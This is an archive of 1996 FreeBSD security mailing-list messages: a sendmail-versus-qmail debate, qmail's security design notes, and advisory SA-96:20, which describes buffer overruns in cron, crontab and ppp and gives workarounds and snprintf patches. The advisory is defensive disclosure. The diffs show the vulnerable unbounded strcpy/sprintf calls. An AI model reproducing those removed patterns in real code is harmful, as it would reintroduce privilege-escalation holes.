Hello. > > > > > > Why sendmail can't be replaced with something more secure by default? > > > I'd suggest Zmailer which can be fount at > > > ftp://ftp.funet.fi/pub/unix/mail/zmailer > > > It is also seems to be faster than sendmail on high loads. > > > > Oh god, don't get the religious wars going again, *please*. > why? anything is more secure than sendmail, and zmailer is used on > highly loaded mail servers. I'm not saying zmailer isn't better -- I have no hard facts on the subject and therefore no opinion. I'm saying that this issue has been thrashed about on the lists ad nauseam, with little or no positive effect, and that there's no point in bringing it up again, because there likely aren't any new arguments on either side since a few weeks ago, when last the issue appeared. Ben The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia. From owner-freebsd-security Tue Dec 17 02:07:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA12821 for security-outgoing; Tue, 17 Dec 1996 02:07:27 -0800 (PST) Received: from ns.uk1.vbc.net (ns.uk1.vbc.net [194.207.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA12815 for ; Tue, 17 Dec 1996 02:07:20 -0800 (PST) Received: (from john@localhost) by ns.uk1.vbc.net (8.7.3/8.7.3) id KAA23246; Tue, 17 Dec 1996 10:10:35 GMT Date: Tue, 17 Dec 1996 10:10:35 +0000 (GMT) From: John Volanthen X-Sender: john@ns.uk1.vbc.net To: security@freebsd.org Subject: unsubscribe security Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk unsubscribe security John Volanthen john@vbc.net VBCnet GB Ltd http://www.uk.vbc.net/ Bristol, England +44 117 929 1316 fax +44 117 927 2015 From owner-freebsd-security Tue Dec 17 02:24:44 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA13586 for security-outgoing; Tue, 17 Dec 1996 02:24:44 -0800 (PST) Received: from ns.uk1.vbc.net (ns.uk1.vbc.net [194.207.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA13579 for ; Tue, 17 Dec 1996 02:24:38 -0800 (PST) Received: (from john@localhost) by ns.uk1.vbc.net (8.7.3/8.7.3) id KAA23379; Tue, 17 Dec 1996 10:28:04 GMT Date: Tue, 17 Dec 1996 10:28:04 +0000 (GMT) From: John Volanthen X-Sender: john@ns.uk1.vbc.net To: freebsd-security@freebsd.org Subject: unsubscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk unsubscribe John Volanthen john@vbc.net VBCnet GB Ltd http://www.uk.vbc.net/ Bristol, England +44 117 929 1316 fax +44 117 927 2015 From owner-freebsd-security Tue Dec 17 03:15:53 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA15871 for security-outgoing; Tue, 17 Dec 1996 03:15:53 -0800 (PST) Received: from kremvax.demos.su (kremvax.demos.su [194.87.0.20]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id DAA15860 for ; Tue, 17 Dec 1996 03:15:50 -0800 (PST) Received: by kremvax.demos.su (8.6.13/D) from 0@megillah.demos.su [194.87.0.21] with ESMTP id OAA21856; Tue, 17 Dec 1996 14:14:16 +0300 Received: by megillah.demos.su id OAA12736; (8.8.3/D) Tue, 17 Dec 1996 14:14:36 +0300 (MSK) Message-Id: <199612171114.OAA12736@megillah.demos.su> Subject: Re: sendmail... To: ley@cert.dfn.de (Wolfgang Ley) Date: Tue, 17 Dec 1996 14:14:36 +0300 (MSK) Cc: vitjok@fasts.com, freebsd-security@freebsd.org In-Reply-To: <199612170931.KAA05839@tiger.cert.dfn.de> from "Wolfgang Ley" at Dec 17, 96 10:31:24 am From: "Mikhail A. Sokolov" X-Class: Fast Organization: Demos Company, Ltd. Reply-To: mishania@demos.su X-Mailer: ELM [version 2.4 PL24 ME7a] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Victor Rotanov wrote: > > Why sendmail can't be replaced with something more secure by default? > > I'd suggest Zmailer which can be fount at > Proof that Zmailer ist more secure than sendmail (note: "there are no/less > *known* security bugs" doesn't count because people most probably haven't > bothered to investigate Zmailer/Smail/Qmail/... in the same depth as > sendmail). > Bye, > Wolfgang. Both issues are correct, but I'd recall Jordan's words/idea from last month's battles: it is possible to set sendmail as a default starting mailer daemon/software in stock distributions of FreeBSD _and_ add optional (say, in /etc/sysconfig) mailer software invocation, something like Qmail/ Zmailer/Smail/whatever. I can also mention, Wolfgang is definetely correct in that sendmail's behaviour is more known than other suggested, and it'll take more and more time to investigate everything about, say, Zmailer. Plus, - let's settle an analogy: we have inn and cnews in ports, and, since tastes differ, people use it on their own risk/experience. News servers software isn't what each user need, but well, the idea might come up from this analogy: stock distribution can have sendmail turned on by default and numerous daemon software in ports/packages? This current battle reminds me "what eats more RAM, Emacs or Netscape" one, and this have been discussed plenty times, eh? Btw, it was told that Jamie Zawinski was proud when Netscape started eating more RAM than Emacs ;-) -mishania P.S. Isn't it an issue of freebsd-current@? From owner-freebsd-security Tue Dec 17 04:03:00 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id EAA18321 for security-outgoing; Tue, 17 Dec 1996 04:03:00 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id EAA18315 for ; Tue, 17 Dec 1996 04:02:58 -0800 (PST) From: proff@suburbia.net Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id EAA29819 for ; Tue, 17 Dec 1996 04:02:47 -0800 (PST) Received: (qmail 4780 invoked by uid 110); 17 Dec 1996 12:01:30 -0000 Message-ID: <19961217120130.4779.qmail@suburbia.net> Subject: Re: sendmail... In-Reply-To: <199612170931.KAA05839@tiger.cert.dfn.de> from Wolfgang Ley at "Dec 17, 96 10:31:24 am" To: ley@cert.dfn.de (Wolfgang Ley) Date: Tue, 17 Dec 1996 23:01:30 +1100 (EST) Cc: vitjok@fasts.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -- Start of PGP signed section. > Victor Rotanov wrote: > > > > Hello. > > > > Why sendmail can't be replaced with something more secure by default? > > I'd suggest Zmailer which can be fount at > > ftp://ftp.funet.fi/pub/unix/mail/zmailer > > It is also seems to be faster than sendmail on high loads. > > Proof that Zmailer ist more secure than sendmail (note: "there are no/less > *known* security bugs" doesn't count because people most probably haven't > bothered to investigate Zmailer/Smail/Qmail/... in the same depth as > sendmail). > > Bye, > Wolfgang. > -- > Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Proof that you haven't investigated Qmail (I can't comment on Zmailer, and I wouldn't trust Smail any more than sendmail, although apparently Debian linux does) - Qmail is a well thought out example of functional compartmentalisation and least-privilege. I strongly suggest people take a good look at the code, and consider making qmail the default MTA for FreeBSD. Qmail handles virtual domains, mail-tables etc, without any sendmail.cf trickery, which even after 10 years and m4 is not something I do in my sleep. Sendmail is a monolithic suid patchwork quilt. Qmail is very much in keeping with the unix paradigm of division of labours and despite it's strong security stance actually seems more efficient than sendmail. Someone suggested on this subject that FreeBSD would be the laughing stock of the network community if it dropped sendmail8(!). This is strange perspective. I had thought *sendmail* was the laughing stock of the networking, security and cracker communities. -Julian (proff@suburbia.net) // attached: qmail/SECURITY Background: Every few months CERT announces Yet Another Security Hole In Sendmail---something that lets local or even remote users take complete control of the machine. I'm sure there are many more holes waiting to be discovered; sendmail's design means that any minor bug in 46000 lines of code is a major security risk. Other popular mailers, such as Smail, and even mailing-list managers, such as Majordomo, seem just as bad. I started working on qmail because I was sick of this cycle of doom. Here are some of the things I did to make sure that qmail will never let an intruder into your machine. 1. Programs and files are not addresses. Don't treat them as addresses. sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster. In qmail, programs and files are not addresses. The local delivery agent, qmail-alias, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-alias makes sure that neither ~user nor ~user/.qmail is group-writable or world-writable.) Security impact: .qmail, like .cshrc and .exrc and various other files, means that anyone who can write arbitrary files as a user can execute arbitrary programs as that user. That's it. 2. Do as little as possible in setuid programs. A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything. Of the twelve most recent sendmail security holes, six worked only because the entire sendmail system is setuid. Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue. 3. Do as little as possible as root. The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root. 4. Move separate functions into mutually untrusting programs. Five of the qmail programs---qmail-smtpd, qmail-send, qmail-rspawn, qmail-remote, and tcp-env---are not security-critical. Even if all of these programs are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these five. In fact, these programs don't even trust each other. They are in three groups: tcp-env and qmail-smtpd, which run as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others. (From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.) 5. Don't parse. I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces. The essence of user interfaces is _parsing_---converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data. When another programmer wants to talk to a user interface, he has to _quote_: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data. This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way. When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the recent Majordomo security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting. In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options. All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA. The only nasty case is .qmail, qmail's answer to .forward. I tried to make this as simple as possible, but unfortunately it still has to be edited by users. As a result, the qlist mailing-list-management program has to be careful to exclude subscriber addresses that contain newlines. 6. Keep it simple, stupid. See BLURB for some of the reasons that qmail is so much smaller than sendmail. There's nothing inherently complicated about writing a mailer. (Except RFC 822 support; but that's only in qmail-inject.) Security holes can't show up in features that don't exist. 7. Write bug-free code. I've mostly given up on the standard C library. Many of its facilities, particularly stdio, seem designed to encourage bugs. A big chunk of qmail is stolen from a basic C library that I've been developing for several years for a variety of applications. The stralloc concept and getline2() make it very easy to avoid buffer overruns, memory leaks, and artificial line length limits. From owner-freebsd-security Tue Dec 17 05:40:11 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA23871 for security-outgoing; Tue, 17 Dec 1996 05:40:11 -0800 (PST) Received: from tfs.com (tfs.com [140.145.250.1]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id FAA23857 for ; Tue, 17 Dec 1996 05:40:08 -0800 (PST) Received: from critter.tfs.com by tfs.com (smail3.1.28.1) with SMTP id m0vZzij-0003vuC; Tue, 17 Dec 96 05:38 PST Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id OAA15620; Tue, 17 Dec 1996 14:41:05 +0100 (MET) To: proff@suburbia.net cc: ley@cert.dfn.de (Wolfgang Ley), vitjok@fasts.com, freebsd-security@FreeBSD.ORG Subject: Re: sendmail... In-reply-to: Your message of "Tue, 17 Dec 1996 23:01:30 +1100." <19961217120130.4779.qmail@suburbia.net> Date: Tue, 17 Dec 1996 14:41:05 +0100 Message-ID: <15618.850830065@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Listen guys! Please don't waste (any more) bandwidth on the replacement of sendmail. At this time, there is no plans nor signs or hints that such a replacement will happen. If you don't like sendmail, grab the right port/package and be done with it. If you really want it to happen, you will have to do it. Here's how: 1. Compartementalize sendmail in it's own "dist" in src/release/Makefile. 2. Make a similar dist out of your favourite mailer (Ie, src/contrib and the works, including the necessary Makefile magic so it all works according to the principle of least astonishment.) Make sure to clear the copyright issue with the authors &c &c. 3. Build your own releases and test it out. 4. Argue that since we get it for free, we might as well take it now :-) -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc. Power and ignorance is a disgusting cocktail. From owner-freebsd-security Tue Dec 17 10:23:56 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA10752 for security-outgoing; Tue, 17 Dec 1996 10:23:56 -0800 (PST) Received: from vdp01.vailsystems.com (root@vdp01.vailsystems.com [207.152.98.18]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA10746 for ; Tue, 17 Dec 1996 10:23:51 -0800 (PST) Received: from crocodile.vale.com (crocodile [204.117.217.147]) by vdp01.vailsystems.com (8.8.3/8.7.3) with ESMTP id MAA28960 for ; Tue, 17 Dec 1996 12:18:47 -0600 (CST) Received: from jaguar (jaguar.vale.com [204.117.217.146]) by crocodile.vale.com (8.8.3/8.7.3) with SMTP id MAA11546 for ; Tue, 17 Dec 1996 12:18:45 -0600 (CST) Message-ID: <32B6E407.3BDF@vailsys.com> Date: Tue, 17 Dec 1996 12:18:47 -0600 From: Hal Snyder Reply-To: hal@vailsys.com Organization: Vail Systems, Inc. X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: security@freebsd.org Subject: writing secure code (was crontab ...) References: <199612162327.SAA10241@homeport.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk wrote: Is there someplace or some book that someone who is writing new software can refer to for learning how to write secure code in the first place? I certainly don't want to ask some whiny security cop for each and every little detail.... :) I like Chapter 23 of Practical Unix & Internet Security, (2d Ed), by Garfinkel & Spafford, pub. O'Reilly & Associates. From owner-freebsd-security Tue Dec 17 10:52:37 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA11786 for security-outgoing; Tue, 17 Dec 1996 10:52:37 -0800 (PST) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA11781 for ; Tue, 17 Dec 1996 10:52:34 -0800 (PST) Received: (from obrien@localhost) by relay.nuxi.com (8.7.5/8.6.12) id KAA11580; Tue, 17 Dec 1996 10:52:37 -0800 (PST) Message-ID: Date: Tue, 17 Dec 1996 10:52:36 -0800 From: obrien@NUXI.com (David E. O'Brien) To: craig@progroup.com (Craig Shaver) Cc: security@FreeBSD.ORG Subject: Re: crontab security hole exploit References: <199612161654.IAA19864@seabass.progroup.com> X-Mailer: Mutt 0.53 Mime-Version: 1.0 X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 In-Reply-To: <199612161654.IAA19864@seabass.progroup.com>; from Craig Shaver on Dec 16, 1996 08:54:26 -0800 Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Craig Shaver writes: > Is there someplace or some book that someone who is writing new software can > refer to for learning how to write secure code in the first place? I > certainly don't want to ask some whiny security cop for each and every > little detail.... :) Yes. The problem is getting such papers accepted to journals. Which one(s) are approapiate? And then getting people to read them. Matt Bishop has writen two simular papers on the topic: "How to Write a Setuid Program", ;login: 12(1) [jan/feb 1987] pp.5-11 Marcus Ranum offers a tutorial on this topic. It will be offered at the USENIX technical conference in Jan 1997. -- David (obrien@cs.ucdavis.edu) P.S. If you want Bishop's papers, I can try to field requests. From owner-freebsd-security Tue Dec 17 11:17:51 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA12651 for security-outgoing; Tue, 17 Dec 1996 11:17:51 -0800 (PST) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA12634 for ; Tue, 17 Dec 1996 11:17:12 -0800 (PST) Received: (from guido@localhost) by gvr.win.tue.nl (8.8.4/8.8.2) id UAA03326; Tue, 17 Dec 1996 20:16:59 +0100 (MET) From: Guido van Rooij Message-Id: <199612171916.UAA03326@gvr.win.tue.nl> Subject: Re: writing secure code (was crontab ...) In-Reply-To: <32B6E407.3BDF@vailsys.com> from Hal Snyder at "Dec 17, 96 12:18:47 pm" To: hal@vailsys.com Date: Tue, 17 Dec 1996 20:16:59 +0100 (MET) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hal Snyder wrote: > wrote: > > Is there someplace or some book that someone who is writing new > software can > refer to for learning how to write secure code in the first place? I > certainly don't want to ask some whiny security cop for each and every > little detail.... :) > > I like Chapter 23 of Practical Unix & Internet Security, (2d Ed), by > Garfinkel & Spafford, pub. O'Reilly & Associates. > Look also at AUSCERT's document: ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist -Guido From owner-freebsd-security Tue Dec 17 12:10:23 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA15505 for security-outgoing; Tue, 17 Dec 1996 12:10:23 -0800 (PST) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA15448; Tue, 17 Dec 1996 12:09:04 -0800 (PST) Received: (from guido@localhost) by gvr.win.tue.nl (8.8.4/8.8.2) id VAA03986; Tue, 17 Dec 1996 21:07:39 +0100 (MET) Date: Tue, 17 Dec 1996 21:07:39 +0100 (MET) Message-Id: <199612172007.VAA03986@gvr.win.tue.nl> From: FreeBSD Security Officer To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org, freebsd-security@freebsd.org, first-teams@first.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:20.stack-overflow Reply-To: security-officer@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:20 Security Advisory FreeBSD, Inc. Topic: unauthorized access via buffer overruns cron, crontab, ppp Category: core Module: cron, crontab, ppp Announced: 1996-12-16 Affects: 1.0, 1.1, 2.1.0, 2.1.5, 2.1.6, 2.1.6.1 Corrected: 2.2-current as of various dates (see below) 2.1-stable as of various dates (see below) FreeBSD only: yes Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:20/ ============================================================================= I. Background Buffer overrun (aka stack overflow) exploits in system supplied and locally installed utilities are commonly used by individuals wishing to obtain unauthorized access to computer systems. The FreeBSD team has been reviewing and fixing the source code pool to eliminate potential exploits based on this technique. We've found several such exploits (and more have been reported by other sources) and strongly suggest that all operators of FreeBSD machines upgrade to the latest version of FreeBSD (2.1.6.1 at the time of this advisory) if there is a possibility for untrustworthy users to have standard user level access to the system. Most of these problems were fixed with the release of FreeBSD 2.1.6.1, however the following were not: In August of 1996, exploits were discovered in the cron and crontab utilities in FreeBSD. These were fixed in the -current source code pool in August of 1996, but due to a clerical error, were not repaired in the older -stable source code pool used to generate the FreeBSD 2.1.X distributions until 16-Dec-1996. Recently, yet another buffer overrun was discovered in the cron and crontab utilities in FreeBSD. The problem was corrected on 16-Dec-1996 in both -current and -stable. Also recently, a similar overrun has been discovered in the ppp utility. This was fixed in both -current and -stable source code pools on 16-Dec-1996. II. Problem Description The programs in question store user-supplied information in internal buffers. There is no range checking on length of the data copied into these buffers. A malicious user may be able to overflow these buffers through the use of command line options or via enviornment variables and insert and execute their own code fragment which could be used to obtain unauthorized access to the system III. Impact The programs in question may be subverted to allow an unprivileged user to gain root access to the system. These vulnerability can only be exploited by individuals with access to the local system. IV. Workaround Setuid programs invoked by the user may have their setuid permissions removed, or their protection attributes modified so unprivileged users may not operate them at all. This may reduce or eliminate some functionality provided by these programs to normal users. To remove setuid privileges: crontab: # chmod ug-s /usr/bin/crontab ppp: # chmod ug-s /usr/bin/ppp The cron program is started by the system on every boot. This auto-start may be temporarily disabled, and the running cron program stopped. However, cron is a valuable system utility, so we suggest this as a temporary workaround only. To stop cron from executing on system boot, edit the /etc/rc file and change the line: echo -n ' cron'; cron so it reads: # echo -n ' cron'; cron. To turn off a running cron, use the ps program to determine the PID of the currently running cron (use "ps") and type: # kill V. Solution The following patches fixes the vulnerabilities. It should apply cleanly to all FreeBSD 2.1.x systems. It has not been tested with FreeBSD 1.x. After applying these patches, recompile and re-install the affected utilities. *** usr.sbin/cron/cron/database.c 1994/08/27 13:43:03 1.1.1.1 --- usr.sbin/cron/cron/database.c 1996/09/10 03:38:20 1.3 *************** *** 112,119 **** if (dp->d_name[0] == '.') continue; ! (void) strcpy(fname, dp->d_name); ! sprintf(tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); --- 112,119 ---- if (dp->d_name[0] == '.') continue; ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); *** usr.sbin/cron/crontab/crontab.c 1996/04/09 21:23:11 1.3.4.1 --- usr.sbin/cron/crontab/crontab.c 1996/08/05 00:50:02 1.6 *************** *** 167,173 **** ProgramName, optarg); exit(ERROR_EXIT); } ! (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) --- 165,171 ---- ProgramName, optarg); exit(ERROR_EXIT); } ! (void) snprintf(User, sizeof(user), "%s", optarg); break; case 'l': if (Option != opt_unknown) *************** *** 198,204 **** } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } --- 196,203 ---- } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) snprintf(Filename, sizeof(Filename), "%s", ! argv[optind]); } else { usage("file name must be specified for replace"); } *************** *** 480,486 **** ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); goto fatal; } remove: --- 479,486 ---- ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", ! ProgramName); goto fatal; } remove: --- usr.sbin/cron/lib/env.c 1994/08/27 13:43:02 1.1.1.1 +++ usr.sbin/cron/lib/env.c 1996/12/16 18:11:57 @@ -115,7 +115,7 @@ { long filepos; int fileline; - char name[MAX_TEMPSTR], val[MAX_ENVSTR]; + char name[MAX_ENVSTR], val[MAX_ENVSTR]; int fields; filepos = ftell(f); --- usr.sbin/ppp/chat.c 1996/06/10 09:41:45 1.4.4.2 +++ usr.sbin/ppp/chat.c 1996/12/15 20:40:26 @@ -315,7 +315,7 @@ } cp--; } - sprintf(tmp, "%s %s", command, cp); + snprintf(tmp, sizeof tmp, "%s %s", command, cp); (void) MakeArgs(tmp, &vector); pipe(fids); --- usr.sbin/ppp/systems.c 1995/05/30 03:50:58 1.5 +++ usr.sbin/ppp/systems.c 1996/12/15 20:40:26 @@ -75,12 +75,12 @@ cp = getenv("HOME"); if (cp) { SetUserId(); - sprintf(line, "%s/.%s", cp, file); + snprintf(line, sizeof line, "%s/.%s", cp, file); fp = fopen(line, "r"); } if (fp == NULL) { SetPppId(); - sprintf(line, "%s/%s",_PATH_PPP, file); + snprintf(line, sizeof line, "%s/%s", _PATH_PPP, file); fp = fopen(line, "r"); } if (fp == NULL) { @@ -115,12 +115,12 @@ cp = getenv("HOME"); if (cp) { SetUserId(); - sprintf(line, "%s/.%s", cp, file); + snprintf(line, sizeof line, "%s/.%s", cp, file); fp = fopen(line, "r"); } if (fp == NULL) { SetPppId(); /* fix from pdp@ark.jr3uom.iijnet.or.jp */ - sprintf(line, "%s/%s",_PATH_PPP, file); + snprintf(line, sizeof line, "%s/%s", _PATH_PPP, file); fp = fopen(line, "r"); } if (fp == NULL) { ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMrb4FlUuHi5z0oilAQGCjQP/TcKygSf3CLwfJcPSnsQnc0k5fkF3QZvk Lp4K7FTua7M0AHHMn4gjpZEqB0+eqxMEGuZ+VXISSoESWyaOSz+hVLmLU2UZDLO0 WWZWw3MM3UeWAzLLXwRPTLN0tQlpQJyqPNH1okb4c/Lx9IugN1wcGfbiTnOF3NaC d8lhtqcQoi4= =zAKC -----END PGP SIGNATURE----- From owner-freebsd-security Tue Dec 17 14:20:53 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA23319 for security-outgoing; Tue, 17 Dec 1996 14:20:53 -0800 (PST) Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA23196; Tue, 17 Dec 1996 14:19:18 -0800 (PST) Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id WAA12852; Tue, 17 Dec 1996 22:03:44 GMT Date: Tue, 17 Dec 1996 22:05:13 GMT Received: from [194.32.164.2] by seagoon.gid.co.uk; Tue, 17 Dec 1996 22:05:13 GMT X-Sender: rb@194.32.164.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Terry Lambert From: rb@gid.co.uk (Bob Bishop) Subject: Re: vulnerability in new pw suite Cc: proff@iq.org, security@freebsd.org, hackers@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >Five gets you ten that he'll just use rlogin instead, and go for root >on the new system from the user account, never knowing the user's >password (or caring). Well OK, but that just sounds to me like a(nother) good reason to eschew rlogin and co. -- Bob Bishop (0118) 977 4017 international code +44 118 rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK From owner-freebsd-security Tue Dec 17 16:56:11 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA05112 for security-outgoing; Tue, 17 Dec 1996 16:56:11 -0800 (PST) Received: from bunyip.cc.uq.oz.au (daemon@bunyip.cc.uq.oz.au [130.102.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA05104 for ; Tue, 17 Dec 1996 16:56:06 -0800 (PST) Received: (from daemon@localhost) by bunyip.cc.uq.oz.au (8.8.4/8.8.3) id KAA28272; Wed, 18 Dec 1996 10:55:53 +1000 Received: from pandora.devetir.qld.gov.au by ogre.devetir.qld.gov.au (8.7.5/DEVETIR-E0.3a) with ESMTP id KAA28212; Wed, 18 Dec 1996 10:35:19 +1000 (EST) Received: from netfl15a.devetir.qld.gov.au (netfl15a.devetir.qld.gov.au [167.123.24.12]) by pandora.devetir.qld.gov.au (8.6.10/8.6.12) with ESMTP id KAA26838; Wed, 18 Dec 1996 10:32:47 +1000 Received: from localhost by netfl15a.devetir.qld.gov.au (8.6.8.1/DEVETIR-0.1) id AAA27711; Wed, 18 Dec 1996 00:30:41 GMT Message-Id: <199612180030.AAA27711@netfl15a.devetir.qld.gov.au> X-Mailer: exmh version 2.0alpha 12/3/96 To: Snob Art Genre cc: freebsd-security@freebsd.org Subject: Re: sendmail... In-reply-to: Your message of "Tue, 17 Dec 1996 00:59:36 PST." X-Face: 3}heU+2?b->-GSF-G4T4>jEB9~FR(V9lo&o>kAy=Pj&;oVOc<|pr%I/VSG"ZD32J>5gGC0N 7gj]^GI@M:LlqNd]|(2OxOxy@$6@/!,";-!OlucF^=jq8s57$%qXd/ieC8DhWmIy@J1AcnvSGV\|*! >Bvu7+0h4zCY^]{AxXKsDTlgA2m]fX$W@'8ev-Qi+-;%L'CcZ'NBL!@n?}q!M&Em3*eW7,093nOeV8 M)(u+6D;%B7j\XA/9j4!Gj~&jYzflG[#)E9sI&Xe9~y~Gn%fA7>F:YKr"Wx4cZU*6{^2ocZ!YyR Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 18 Dec 1996 10:30:41 +1000 From: Stephen Hocking Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > Ben > > The views expressed above are not those of the Worker's Compensation > Board of Queensland, Australia. > > Ben, how in Hades did you manage to grab my .sig? Stephen -- The views expressed above are not those of the 